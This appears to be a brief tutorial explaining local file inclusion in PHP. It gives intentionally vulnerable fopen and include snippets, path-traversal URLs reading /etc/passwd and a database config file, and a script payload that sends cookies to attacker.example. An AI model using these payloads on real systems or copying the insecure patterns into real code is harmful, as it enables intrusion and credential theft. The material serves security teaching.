What is local file inclusion?
Local file inclusion (LFI) is a web vulnerability that lets a malicious hacker access, view, and/or include files located in the web server file system within the document root folder.
<?PHP
$file = $_GET["file"];
$handle = fopen($file, 'r');
$poem = fread($handle, 1);
fclose($handle);
echo $poem;
?>
http://victim.example/my_app/display.php?file=poem.txt
http://victim.example/my_app/display.php?file=../config/database.php
http://example.com/my_app/display.php?file=../../../../etc/passwd
LFI that leads to cross-site scripting
The attack vector The attacker first uses the poem file upload functionality to upload the following “poem” as a text file called poem42.txt:
<script>fetch("http://attacker.example?log="+encodeURIComponent(document.cookie));</script>
Then, the attacker submits a request to include the poem:
http://victim.example/my_app/display.php?file=poem42.txt
LFI that leads to remote code execution
<?PHP
$module = $_GET["module"];
include $module;
?>
http://victim.example/index.php?module=welcome.php
http://victim.example/index.php?module=poems/poem42.txt